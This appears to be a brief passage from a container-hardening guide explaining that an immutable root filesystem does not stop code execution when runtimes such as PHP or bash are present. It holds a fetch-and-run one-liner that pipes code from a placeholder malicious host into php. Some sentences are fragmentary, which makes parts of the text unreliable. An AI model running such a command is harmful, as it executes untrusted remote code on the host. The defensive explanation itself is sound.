An immutable root filesystem prevents applications from writing to their local disk. This is desirable in the event of an intrusion as the attacker will not be able to tamper with the filesystem or write foreign executables to disk.
However if there are runtimes available in the container then this is not sufficient to prevent code execution. Consider
curl http://malicious.php | php or
bash -c "echo 'much pasted code'".
emptyDirvolume can be mounted with type
immutableRootFilesystem- they contain only your code, minimal
sys, and so need a runtime (or injection into the scratch binary) to execute code. Without a writable filesystem the attack surface is dramatically reduced.
Built with by controlplane